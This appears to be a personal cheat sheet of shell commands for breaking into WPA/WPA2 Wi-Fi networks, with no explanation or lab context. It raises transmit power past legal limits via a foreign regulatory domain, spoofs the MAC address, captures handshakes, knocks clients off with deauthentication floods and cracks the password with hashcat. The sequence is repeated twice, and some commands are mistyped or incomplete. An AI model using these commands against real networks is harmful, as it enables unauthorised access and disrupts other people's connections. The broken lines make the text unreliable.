#Increase Wi-Fi TX Power
ifconfig wlan0 down
iw reg serBO BZ
iwconfig wlan0 txpower 1000mW
airmon-ng check kill
airmon-ng start wlan0
#Change MAC
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
#List available AP
airodump mon0
#Dump handshake
airodump-ng -w <out.cap> --bssid <BSSID> -c <channel> mon0
#Deauthentication
aireplay-ng --deauth 5 -a <BSSID> -c <ClientMAC> wlan0
or
aireplay-ng --deauth 0 -a <BSSID> mon0
#Cracking WPA/WPA2 with oclHashcat
aircrack-ng <out.cap> -J <out.hccap>
Dictionary attack
./cudaHashcat64.bin -m 2500 <out.hccap> <dictionary.txt>
or Brute-Force
./cudaHashcat64.bin -m 2500 -a3 <out.hccap> ?d?d?d?d?d?d?d?d
ifconfig wlan0 down
iw reg ser
iwconfig wlan0 txpower 1000mW
ifconfig wlan0 up
#Start mon0 interface
airmon-ng check kill
airmon-ng start wlan0
#Change MAC
ifconfig mon0 down
macchanger -r mon0
ifconfig mon0 up
#List available AP
airodump mon0
#Dump handshake
airodump-ng -w <out.cap> --bssid <BSSID> -c <channel> mon0
#Deauthentication
aireplay-ng --deauth 5 -a <BSSID> -c <ClientMAC> wlan0
or
aireplay-ng --deauth 0 -a <BSSID> mon0
#Cracking WPA/WPA2 with oclHashcat
aircrack-ng <out.cap> -J <out.hccap>
Dictionary attack
./cudaHashcat64.bin -m 2500 <out.hccap> <dictionary.txt>
or Brute-Force
./cudaHashcat64.bin -m 2500 -a3 <out.hccap> ?d?d?d?d?d?d?d?d